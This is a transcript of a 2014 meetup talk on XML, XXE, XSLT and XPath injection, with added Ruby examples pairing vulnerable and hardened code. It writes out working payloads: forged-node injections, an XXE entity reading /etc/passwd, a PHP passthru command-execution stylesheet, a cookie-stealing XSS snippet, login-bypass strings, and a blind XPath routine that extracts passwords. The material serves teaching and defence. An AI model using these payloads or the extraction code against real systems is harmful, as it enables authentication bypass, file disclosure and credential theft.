XML & XPath Injections
This presentation was given at the null/G4h monthly meet, Bangalore, in August 2014.
TRANSCRIPT
XML & XPath Injection
By AMol NAik (@amolnaik4)
Agenda
XML Basics
XML Injection
XXE Attack
XSLT Attacks
XPath Basics
XPath Injections
XPath Tools
All code is at:
https://bitbucket.org/null0x00/null-humla-xml-injection/
XML Basics
eXtensible Markup Language
Flexible text-based format
Presents structured information
Used for data exchange and storage
XML Components
Root Element
Node
Node Value
Attribute
Entity
CDATA Section
XML – CDATA Section
Tells the parser not to treat the characters in this section as markup
Examples:
<![CDATA[if (c<10)]]>
<![CDATA[<script>alert(1)</script>]]>
XML Injections
In Node Attribute
In Node Value
In CDATA Section
XML Injection – Node Attribute
Injection point: the id attribute of book 101. Payload, supplied as the id value:
102"><author>demo</author><title>Demo Demo</title><price>FREE</price></book><book id="101
Original document:
<catalog>
<book id="101">
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – Node Attribute
Resulting document (a second book node has been injected ahead of the original one):
<catalog>
<book id="102">
<author>demo</author>
<title>Demo Demo</title>
<price>FREE</price>
</book>
<book id="101">
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – Node Value
Injection point: the author element's value. Payload, supplied as the author:
Anonymous</author><title>Demo Demo</title><price>FREE</price></book><book id="102"><author>demo
Original document:
<catalog>
<book id="101">
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – Node Value
Resulting document (the payload closes book 101 early and the original title and price now belong to the injected book 102):
<catalog>
<book id="101">
<author>Anonymous</author>
<title>Demo Demo</title>
<price>FREE</price>
</book>
<book id="102">
<author>demo</author>
<title>We Are Anonymous</title>
<price>INR 200</price>
</book>
</catalog>
XML Injection – CDATA
Injection point: the CDATA section holding the price. Payload, supplied as the price (the leading ]]> terminates the section, and the trailing <![CDATA[ re-opens one so the original ]]> still closes cleanly):
INR 200]]></price></book><book id="102"><author>demo</author><title>Demo Demo</title><price><![CDATA[FREE
Original document:
<catalog>
<book id="101">
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price><![CDATA[INR 200]]></price>
</book>
</catalog>
XML Injection – CDATA
Resulting document:
<catalog>
<book id="101">
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price><![CDATA[INR 200]]></price>
</book>
<book id="102">
<author>demo</author>
<title>Demo Demo</title>
<price><![CDATA[FREE]]></price>
</book>
</catalog>
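The three injection points above, as an added Ruby (REXML) example that is not part of the slides or the linked repository: a catalog builder that interpolates user input the way the demo does, a hardened builder that validates the id and goes through the DOM API for the text values, and the three slide payloads run through both. The function and constant names are mine; the catalog values and payloads are the slides' own.

```ruby
require 'rexml/document'

# Vulnerable builder: the slides' catalog assembled by string interpolation.
# User input lands in an attribute value, an element value and a CDATA
# section, so a value can close the node it sits in and open new ones.
def build_catalog_vulnerable(id, author, title, price)
  <<~XML
    <catalog>
      <book id="#{id}">
        <author>#{author}</author>
        <title>#{title}</title>
        <price><![CDATA[#{price}]]></price>
      </book>
    </catalog>
  XML
end

# Hardened builder: the id has a known shape, so it is validated against an
# allow-list rather than escaped; the text values are added through the DOM
# API, which escapes <, >, & and quotes on serialisation so a payload stays
# a string instead of becoming markup.
def build_catalog_safe(id, author, title, price)
  raise ArgumentError, "book id must be numeric" unless id.match?(/\A\d+\z/)
  doc = REXML::Document.new
  book = doc.add_element("catalog").add_element("book", "id" => id)
  book.add_element("author").add_text(author)
  book.add_element("title").add_text(title)
  book.add_element("price").add_text(price)
  doc.to_s
end

# What a consumer of the catalog sees: [id, author, price] for each book.
def books_in(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, "/catalog/book").map do |book|
    [book.attributes["id"], book.elements["author"].text, book.elements["price"].text]
  end
end

# The three slide payloads (constructed sample input), one per injection point.
ATTR_PAYLOAD  = '102"><author>demo</author><title>Demo Demo</title><price>FREE</price></book><book id="101'
VALUE_PAYLOAD = 'Anonymous</author><title>Demo Demo</title><price>FREE</price></book><book id="102"><author>demo'
CDATA_PAYLOAD = 'INR 200]]></price></book><book id="102"><author>demo</author><title>Demo Demo</title><price><![CDATA[FREE'
```

Feeding any of the three payloads into build_catalog_vulnerable makes books_in report two books, which is exactly the "resulting document" on the slides. The same payloads through build_catalog_safe yield one book whose author or price is the literal payload string, and the attribute payload is rejected outright because it is not a number.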
XML Entity
Variable definitions
Shortcuts
Standard text
Special characters
Can be internal or external
XML Entity
XXE Attack
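The entity slides above, illustrated with an added Ruby (REXML) example that is not from the slides or the linked repository. It shows an internal entity expanding as a shortcut for standard text, and a check that lists the external (SYSTEM or PUBLIC) entities declared in a document, which is the shape an XXE payload takes. Both documents are constructed samples and the function names are mine; REXML records an external entity declaration but does not fetch the resource it points at.

```ruby
require 'rexml/document'

# Constructed sample: an internal entity used as a shortcut for standard text.
INTERNAL_ENTITY_DOC = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE catalog [
    <!ENTITY publisher "null community press">
  ]>
  <catalog><book id="101"><publisher>&publisher;</publisher></book></catalog>
XML

# Constructed sample: an external SYSTEM entity, the shape an XXE payload takes.
EXTERNAL_ENTITY_DOC = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE catalog [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <catalog><book id="101"><publisher>&xxe;</publisher></book></catalog>
XML

# Reads the publisher element; REXML expands internal entities when the
# text value is requested, so the reference comes back as its replacement text.
def publisher_text(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.first(doc, "/catalog/book/publisher").text
end

# Names of the entities declared in the internal subset that point outside the
# document (SYSTEM or PUBLIC). The predefined lt/gt/quot/apos entities are
# internal and are skipped. A document for which this is non-empty should be
# rejected before it reaches any parser that resolves external entities.
def external_entity_names(xml)
  doc = REXML::Document.new(xml)
  return [] if doc.doctype.nil?
  doc.doctype.entities.values.select(&:external).map(&:name)
end
```

The check is a pre-filter, not a fix: a parser that does resolve external entities (libxml2 with entity substitution turned on, or a Java DocumentBuilder left at its defaults) turns the SYSTEM declaration into file disclosure or server-side requests, so the real control is to disable DTD processing in that parser and keep this check as defence in depth.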
XSLT
Extensible Stylesheet Language Transformations
Used to transform XML documents into other documents (XML, HTML or text)
Think of it as the CSS of XML
XSLT
XSLT Injection
XSS:
<script>alert(document.cookie)</script>
Code execution (PHP's XSLTProcessor with registerPHPFunctions() enabled):
<xsl:value-of select="php:function('passthru','ls -la /')"/>
XPath Basics
A language for selecting nodes from an XML document
Treats the XML document as a tree of nodes
Similar to SQL in some respects
XPath Syntax
Uses path expressions to select nodes or node-sets in an XML document.
Expression    Description
nodename      Selects all child nodes of the named node
/             Selects from the root node
//            Selects matching nodes anywhere below the current node
.             Selects the current node
..            Selects the parent of the current node
XPath Predicates
Used to find a specific node, or a node that contains a specific value.
Always embedded in square brackets.
Expression                          Result
/Employees/Employee[1]              Selects the first 'Employee' element that is a child of 'Employees'
/Employees/Employee[last()]         Selects the last 'Employee' element that is a child of 'Employees'
/Employees/Employee[position()<3]   Selects the first two 'Employee' elements that are children of 'Employees'
//Employee[@ID='1']                 Selects all 'Employee' elements that have an attribute named 'ID' with the value '1'
XPath Location Path
Syntax: axisname::nodetest[predicate]
axis - defines the tree relationship between the selected nodes and the current node
nodetest - identifies the nodes within that axis
zero or more predicates - further refine the selected node-set
XPath Location Path
Example                Result
child::Employee        Selects all 'Employee' elements that are children of the current node
attribute::id          Selects the id attribute of the current node
child::*               Selects all element children of the current node
attribute::*           Selects all attributes of the current node
child::text()          Selects all text-node children of the current node
child::node()          Selects all children of the current node
descendant::Employees  Selects all 'Employees' descendants of the current node
XPath Functions
Function                   Description
substring(str,start,len)   Returns the substring of str of length len starting at position start (positions are 1-based)
string-length(str)         Returns the length of the string
count(node-set)            Returns the number of nodes in the node-set
starts-with(str1,str2)     Returns true if str1 starts with str2, else false
contains(str1,str2)        Returns true if str1 contains str2, else false
number(arg)                Returns the numeric value of the argument; the argument can be a boolean, a string or a node-set
string(arg)                Returns the string value of the argument; the argument can be a boolean, a string or a node-set
XPath Injection
XPath Query:
/Employees/Employee[UserName/text() = 'user' and Password/text() = 'passwd']/Type/text()
XPath Injection
No UserName and Password known:
user = ' or '1'='1
passwd = ' or '1'='1
/Employees/Employee[UserName/text() = '' or '1'='1' and Password/text() = '' or '1'='1']/Type/text()
The trailing '1'='1' is always true, so the predicate matches every Employee.
XPath Injection
UserName known:
user = mbrown' or '1'='1
passwd = anything
/Employees/Employee[UserName/text() = 'mbrown' or '1'='1' and Password/text() = 'anything']/Type/text()
'and' binds tighter than 'or', so this reads UserName = 'mbrown' or ('1'='1' and Password = 'anything') and returns mbrown's record without the password.
XPath Injection
No UserName and Password known, and the Password field is not vulnerable:
user = ' or '1'='1' or '1'='1
passwd = anything
/Employees/Employee[UserName/text() = '' or '1'='1' or '1'='1' and Password/text() = 'anything']/Type/text()
The middle '1'='1' stands alone between two 'or's, so the predicate is true for every Employee whatever the password clause evaluates to.
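The login query and the three bypasses above, as an added Ruby (REXML) example that is not from the slides or the linked repository. The vulnerable lookup interpolates the user-supplied values into the slide query; the hardened lookup binds them as XPath variables, which is the XPath equivalent of a parameterised SQL statement. The Employees document is a constructed sample and the function and constant names are mine.

```ruby
require 'rexml/document'

# Constructed sample of the Employees document the slides query.
EMPLOYEES = REXML::Document.new(<<~XML)
  <Employees>
    <Employee ID="1"><UserName>mbrown</UserName><Password>s3cret</Password><Type>Admin</Type></Employee>
    <Employee ID="2"><UserName>jdoe</UserName><Password>letmein</Password><Type>User</Type></Employee>
  </Employees>
XML

# Vulnerable: the slides' login query assembled by string interpolation.
# Returns the Type of every Employee whose predicate holds, so a correct
# login yields one Type and an always-true predicate yields everyone's.
def lookup_type_vulnerable(user, pass)
  query = "/Employees/Employee[UserName/text()='#{user}' and Password/text()='#{pass}']/Type/text()"
  REXML::XPath.match(EMPLOYEES, query).map(&:value)
end

# Hardened: the same query with the values bound as XPath variables through
# the API. They never become part of the expression text, so quotes, 'or'
# and 'and' inside them are compared as characters, not parsed as operators.
SAFE_QUERY = '/Employees/Employee[UserName/text()=$u and Password/text()=$p]/Type/text()'

def lookup_type_safe(user, pass)
  REXML::XPath.match(EMPLOYEES, SAFE_QUERY, {}, { "u" => user, "p" => pass }).map(&:value)
end

# The three [user, passwd] pairs from the slides, as constructed input.
BYPASS_BOTH      = ["' or '1'='1", "' or '1'='1"]
BYPASS_KNOWN     = ["mbrown' or '1'='1", "anything"]
BYPASS_USER_ONLY = ["' or '1'='1' or '1'='1", "anything"]
```

Against the vulnerable lookup the first and third pairs return both Types (every record matched) and the second returns mbrown's Type without the password; against the variable-bound lookup all three return nothing, while the genuine credentials still return Admin. Where the XPath library offers no variable binding, the fallback is a strict allow-list on the input (for example, a username limited to [A-Za-z0-9_]), since XPath 1.0 has no escape sequence for a quote inside a string literal.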
Blind XPath Injection
XPath Query: /Employees/Employee[@ID='_id_']
/Employees/Employee[@ID='1' and '1'='1'] => TRUE
/Employees/Employee[@ID='1' and '1'='2'] => FALSE
Blind XPath Injection
Extracting the XML file structure:
Get the count of nodes under the root element: count(/*/child::*)
Get the name of the first node: name(/*/child::*[1])
Get the count of child nodes of the first node: count(/*/child::*[1]/child::*)
Blind XPath Injection
Extracting the XML file structure:
Get the name of the first child node of the first node: name(/*/child::*[1]/child::*[1])
Get the value of the first child node of the first node: /*/child::*[1]/child::*[1]/text()
Repeat the process for all child nodes
Blind XPath Injection
Extracting the XML file structure:
Check whether the first character of the value of the first child node of the first node is 'J'. With an ID that matches no record (123 here), the injected clause alone decides whether anything comes back:
/Employees/Employee[@ID='123' or substring((/*/child::*[1]/child::*[1]/text()),1,1)='J']
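The structure-extraction procedure above, as an added Ruby (REXML) example that is not from the slides or the linked repository. It generalises the slide queries into a tree walk that learns everything through the true/false answer of the @ID lookup: count() and string-length() are recovered by probing numbers, names and values by probing one character at a time with substring(), as the 'J' check does. The document, the assumption that ID 123 matches no record, the character set and the function names are mine.

```ruby
require 'rexml/document'

# Constructed sample of the document behind the vulnerable lookup.
EMPLOYEES = REXML::Document.new(<<~XML)
  <Employees>
    <Employee ID="1"><UserName>mbrown</UserName><Password>s3cret</Password><Type>Admin</Type></Employee>
    <Employee ID="2"><UserName>jdoe</UserName><Password>letmein</Password><Type>User</Type></Employee>
  </Employees>
XML

QUERY_LOG = [] # every query the "application" ran, to show the cost of blind extraction

# The slides' vulnerable endpoint: /Employees/Employee[@ID='_id_'].
# The attacker only learns whether a record came back.
def record_exists?(id)
  query = "/Employees/Employee[@ID='#{id}']"
  QUERY_LOG << query
  !REXML::XPath.first(EMPLOYEES, query).nil?
end

# Boolean oracle. ID 123 is assumed to match nothing, so the predicate
# "@ID='123' or <expr> and '1'='1'" has the truth value of expr ('and' binds
# tighter than 'or'); the trailing clause absorbs the template's closing quote.
def ask(expr)
  record_exists?("123' or #{expr} and '1'='1")
end

# Characters tried for each position; order them by likelihood to save queries.
CHARSET = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a + [" "]

# Recovers a small non-negative integer (a count() or string-length()) by probing.
def blind_number(expr, max = 32)
  n = (0..max).find { |i| ask("#{expr}=#{i}") }
  raise "#{expr} is above #{max}" if n.nil?
  n
end

# Recovers a string one character at a time with substring(), after first
# learning its length so the loop terminates without a sentinel.
def blind_string(expr)
  len = blind_number("string-length(#{expr})")
  (1..len).map { |i| CHARSET.find { |c| ask("substring(#{expr},#{i},1)='#{c}'") } || "?" }.join
end

# Walks the tree from a location path: the node's name first, then either its
# element children (recursively) or, for a leaf, its text value.
# Returns {name => [children]} for a branch and {name => text} for a leaf.
def blind_dump(path = "/*")
  name = blind_string("name(#{path})")
  children = blind_number("count(#{path}/child::*)")
  if children.zero?
    { name => blind_string("#{path}/text()") }
  else
    { name => (1..children).map { |i| blind_dump("#{path}/child::*[#{i}]") } }
  end
end
```

blind_dump reconstructs the whole sample document, user names and passwords included, from nothing but yes/no answers; QUERY_LOG.size afterwards is in the thousands even for this tiny file, which is why the attack stands out in request logs as a burst of near-identical lookups whose only variation is the probed character. The tools listed on the next slide automate the same loop.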
XPath Injection Tools
XPath Blind Explorer
Xcat
xmlchor - IronWASP Plugin
recon-ng
xpath_bruter
Thank You !!
AMol NAik
http://twitter.com/amolnaik4
http://amolnaik4.blogspot.com